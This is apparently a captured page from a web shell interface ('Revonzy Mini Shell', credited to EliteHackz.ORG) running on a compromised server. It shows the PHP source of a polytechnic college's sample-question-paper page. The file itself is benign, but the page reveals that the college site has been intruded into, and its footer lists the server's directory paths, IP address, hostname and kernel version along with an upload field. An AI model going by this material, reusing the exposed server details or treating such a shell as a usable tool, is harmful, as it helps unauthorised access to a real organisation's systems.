Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/sample-question-paper.php

<?php
	require_once("header.php");
?>

<div class="parent_colour container">				
	<div class="department-main-section">	
		<br />
		<center><h2 class="head-title">Sample Question Paper</h2>
		<?php
			require_once("download-left-panel.php");
		?>
		<div class="parent_data_contnr" >
		
<style>
.nav-pills li a    
 {
     background-color:#FFFFFF;
 }   
</style>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <ul class="nav nav-pills" style="font-size:14px; color:#FFFFFF">
    <li style="background-color:#FFFFFF; border-radius:5px;" class="active"><a data-toggle="pill" href="#home">Computer Engg.</a></li>
    <li style="background-color:#FFFFFF; border-radius:5px;"><a data-toggle="pill" href="#menu1">Civil Engg.</a></li>
    <li style="background-color:#FFFFFF; border-radius:5px;"><a data-toggle="pill" href="#menu2">Mechanical Engg.</a></li>
    <li style="background-color:#FFFFFF; border-radius:5px;"><a data-toggle="pill" href="#menu3">E & TC Engg.</a></li>
  </ul>
  
  <div class="tab-content">
    <div id="home" class="tab-pane fade in active">
      <h3>Computer Question Paper</h3>
      
      	  <table border=2  cellpadding="2px" class="comn_tab">
				<thead style="color:#FFFFFF;">
					<td width="50">Sr.No.</td>
					
					<td width="200"> Title</td>
					<td width="100">View</td>
				</thead>
      <?php
			$department = "Computer Engineering";	
			$section = "Sample Question Paper";					
			$details = $db->get_all_curriculum_of_department_wise_and_section($department,$section);
		if(!empty($details))
		{ 
			$counter =0;
			foreach($details as $record)
			{ 
				$id				=	$details[$counter][0];
				$department		=	$details[$counter][1];
				$section		=	$details[$counter][2];
				$title			=	$details[$counter][3];
				$image			=	$details[$counter][4];
		?>
		            <!--<div class="PDF">
							   <object data="downloads/<?php echo $image; ?>" type="application/pdf" width="100%" height="800">
								   alt : <a href="downloads/<?php echo $image; ?>"><?php echo $title; ?></a>
							   </object>
					</div>-->
					<tr>
						<td><?php echo $counter+1; ?></td>
						<td style="text-align:left;"> <?php echo $title; ?></td>
						<td><a href="/downloads/<?php echo $image; ?>" target="_blank" class="download-title"> View</a></td>
					</tr>
				 
									<?php 
												$counter++;
											}
										}else
										{
									?>
											No Data Found...
									<?php
									}
									?>
				</table>
    </div>
    <div id="menu1" class="tab-pane fade">
      <h3>Civil Question Paper</h3>
      
        <table border=2  cellpadding="2px" class="comn_tab">
				<thead style="color:#FFFFFF;">
					<td width="50">Sr.No.</td>
					
					<td width="200"> Title</td>
					<td width="100">View</td>
				</thead>
     <?php
			$department = "Civil Engineering";	
			$section = "Sample Question Paper";					
			$details = $db->get_all_curriculum_of_department_wise_and_section($department,$section);
		if(!empty($details))
		{ 
			$counter =0;
			foreach($details as $record)
			{ 
				$id				=	$details[$counter][0];
				$department		=	$details[$counter][1];
				$section		=	$details[$counter][2];
				$title			=	$details[$counter][3];
				$image			=	$details[$counter][4];
		?>
            		<!--<div class="PDF">
							   <object data="downloads/<?php echo $image; ?>" type="application/pdf" width="100%" height="800">
								   alt : <a href="downloads/<?php echo $image; ?>"><?php echo $title; ?></a>
							   </object>
					</div>-->
					<tr>
						<td><?php echo $counter+1; ?></td>
						<td style="text-align:left;"> <?php echo $title; ?></td>
						<td><a href="/downloads/<?php echo $image; ?>" target="_blank" class="download-title"> View</a></td>
					</tr>
				 
										<?php 
												$counter++;
											}
										}else
										{
										?>
											No Data Found...
										<?php
										}		
										?>
					</table>
    </div>
    <div id="menu2" class="tab-pane fade">
      <h3>Mechanical Question Paper</h3>
      <table border=2  cellpadding="2px" class="comn_tab">
			<thead style="color:#FFFFFF;">
				<td width="50">Sr.No.</td>
				
				<td width="200"> Title</td>
				<td width="100">View</td>
			</thead>
       <?php
			$department = "Mechanical Engineering";		
			$section = "Sample Question Paper";					
			$details = $db->get_all_curriculum_of_department_wise_and_section($department,$section);
		if(!empty($details))
		{ 
			$counter =0;
			foreach($details as $record)
			{ 
				$id				=	$details[$counter][0];
				$department		=	$details[$counter][1];
				$section		=	$details[$counter][2];
				$title			=	$details[$counter][3];
				$image			=	$details[$counter][4];
		?>
		            <!--<div class="PDF">
							   <object data="downloads/<?php echo $image; ?>" type="application/pdf" width="100%" height="800">
								   alt : <a href="downloads/<?php echo $image; ?>"><?php echo $title; ?></a>
							   </object>
					</div>-->
					<tr>
						<td><?php echo $counter+1; ?></td>
						<td style="text-align:left;"> <?php echo $title; ?></td>
						<td><a href="/downloads/<?php echo $image; ?>" target="_blank" class="download-title"> View</a></td>
					</tr>
				 
										<?php 
												$counter++;
											}
										}else
										{
										?>
											No Data Found...
										<?php
										}		
										?>
					</table>					
    </div>
    <div id="menu3" class="tab-pane fade">
      <h3>E & Tc Question Paper</h3>
       <table border=2  cellpadding="2px" class="comn_tab">
			<thead style="color:#FFFFFF;">
				<td width="50">Sr.No.</td>
				
				<td width="200"> Title</td>
				<td width="100">View</td>
			</thead>
      <?php
			$department = "Electronics And Telecommunication Engineering";	
			$section = "Sample Question Paper";					
			$details = $db->get_all_curriculum_of_department_wise_and_section($department,$section);
		if(!empty($details))
		{ 
			$counter =0;
			foreach($details as $record)
			{ 
				$id				=	$details[$counter][0];
				$department		=	$details[$counter][1];
				$section		=	$details[$counter][2];
				$title			=	$details[$counter][3];
				$image			=	$details[$counter][4];
		?>
            		<!--<div class="PDF">
							   <object data="downloads/<?php echo $image; ?>" type="application/pdf" width="100%" height="800">
								   alt : <a href="downloads/<?php echo $image; ?>"><?php echo $title; ?></a>
							   </object>
					</div>-->
					<tr>
						<td><?php echo $counter+1; ?></td>
						<td style="text-align:left;"> <?php echo $title; ?></td>
						<td><a href="/downloads/<?php echo $image; ?>" target="_blank" class="download-title"> View</a></td>
					</tr>
				 
										<?php 
												$counter++;
											}
										}else
										{
										?>
											No Data Found...
										<?php
										}		
										?>
						</table>
    </div>
  </div>

			
		</div>			
	</div>
</div>
	
<?php
	require_once("footer.php");
?>
	


EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4